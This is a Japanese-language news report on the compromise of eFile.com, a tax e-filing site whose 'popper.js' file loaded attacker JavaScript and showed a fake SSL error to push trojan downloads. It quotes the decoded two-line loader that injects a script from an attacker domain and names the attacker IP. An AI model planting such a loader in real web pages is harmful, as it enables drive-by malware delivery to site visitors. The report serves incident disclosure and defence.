taxes

多くの人が納税申告書を提出するために使用している IRS 認定の電子ファイル ソフトウェア サービス プロバイダーである eFile.com が、JavaScript マルウェアを提供していることが発覚しました。

セキュリティ研究者は、悪意のある JavaScript ファイルが eFile.com Web サイトに数週間存在していたと述べています。その時点で、問題の悪意のある JavaScript ファイルの存在を確認できました。

このセキュリティ インシデントは特に eFile.com に関するものであり、同一のドメインやIRS の電子ファイル インフラストラクチャに関するものではないことに注意してください。

ちょうど納税シーズンに間に合いました

複数のユーザーや研究者が発見したように、eFile.com はマルウェアを配信しているのが見つかりました。問題の悪意のある JavaScript ファイルは「popper.js」と呼ばれます。

悪意のある popper.js ファイルを提供する eFile.com
eFile.com が Web ページ全体で使用する「popper.js」ファイルにマルウェアが含まれている
()

この展開は、米国の納税者が 4 月 18 日の期日までに IRS の納税申告書をまとめようとしている重要な時期にもたらされました。

上記の強調表示されたコードは base64 でエンコードされており、そのデコードされたバージョンが以下に示されています。このコードは、 infoamanewonliag[.]online によって返された JavaScript の読み込みを試みます。

s=document.createElement(‘script’);document.body.appendChild(s);
s.src=’//www.infoamanewonliag[.]online/update/index.php?’+Math.random();

最後に Math.random() を使用すると、eFile.com にアクセスするたびに攻撃者が変更を加えた場合に、キャッシュが防止され、マルウェアの新しいコピーが読み込まれる可能性があります。執筆時点では、エンドポイントは稼働していません。

悪意のある JavaScript ファイル「popper.js」が、少なくとも 4 月 1 日まで、eFile.com のほぼすべてのページで読み込まれていたことを確認できます。

popper.js を提供する eFile.com ページ
poppers.js を提供する eFile.com ページ()

今日の時点で、このファイルが悪意のあるコードを提供している様子は見られなくなりました。

ウェブサイトが 2 週間以上前に「ハイジャック」されました

3 月 17 日、複数の eFile.com ユーザーが Web サイトが「乗っ取られた」と疑う Reddit スレッドが浮上しました。

当時、この Web サイトには SSL エラー メッセージが表示されていました。

eFile.com が示す SSL エラー
eFile.com が示す SSL エラー(Reddit の u/SaltyPotter)

実際にそうであることがわかります。研究者は、Amazon AWS エンドポイントによって提供されていた、この攻撃に関連する追加のファイル「update.js」を発見しました。

いわゆる「update.js」を取得したところ、偽の SSL エラー メッセージが base64 でエンコードされた HTML コード (以下で強調表示) として存在することがわかりました。

base64 でエンコードされた偽の SSL エラー メッセージ
base64 でエンコードされた HTML だけの偽の SSL エラー メッセージ()

偽の SSL エラーを生成するデコードされた文字列からの HTML の抜粋を以下に示します。

偽の SSL エラー メッセージを生成する HTML コード
偽の SSL エラー メッセージを生成するデコードされた base64 HTML コード()

悪意のある JavaScript ファイル「update.js」は、Chrome [update.exe – VirusTotal ] または Firefox [installer.exe – VirusTotal ] のどちらを使用しているかに応じて、次の段階のペイロードをダウンロードするようユーザーに促します。一部のウイルス対策製品は、これらの実行可能ファイルをトロイの木馬としてフラグ付けし始めています。

これらのバイナリが、Alibaba でホストされていると思われる東京ベースの IP アドレス 47.245.6.91 への接続を確立することを独自に確認しました。同じ IP が、この問題に関連する不正なドメインinfoamanewonliag[.]onlineもホストしています。

これらのバイナリをさらに分析した MalwareHunterTeam という名前のセキュリティ研究グループはこれらのバイナリには PHP で記述された Windows ボットネットが含まれていると述べています。さらに、悪意のあるコードを Web サイトに数週間放置したことで eFile.com を非難しました。

「そのため、[efile.com] の Web サイトは…少なくとも 3 月中旬に侵害され、まだ駆除されていません」と MalwareHunterTeam は書いています

Reddit スレッドを参照して、彼らはさらに次のように述べています。

SANS Institute の Johannes Ulrich 博士も、この問題の分析を発表しました。

攻撃が eFile.com の訪問者や顧客への感染に成功したかどうかを含め、このインシデントの全容はまだわかっていません。

公開するかなり前に、eFile.com に質問を寄せてきました。

2022 年 1 月、LockBit ランサムウェア ギャングは、eFile.com を攻撃したと主張しました。その時点で、攻撃を確認または否定する会社からの応答はありませんでした。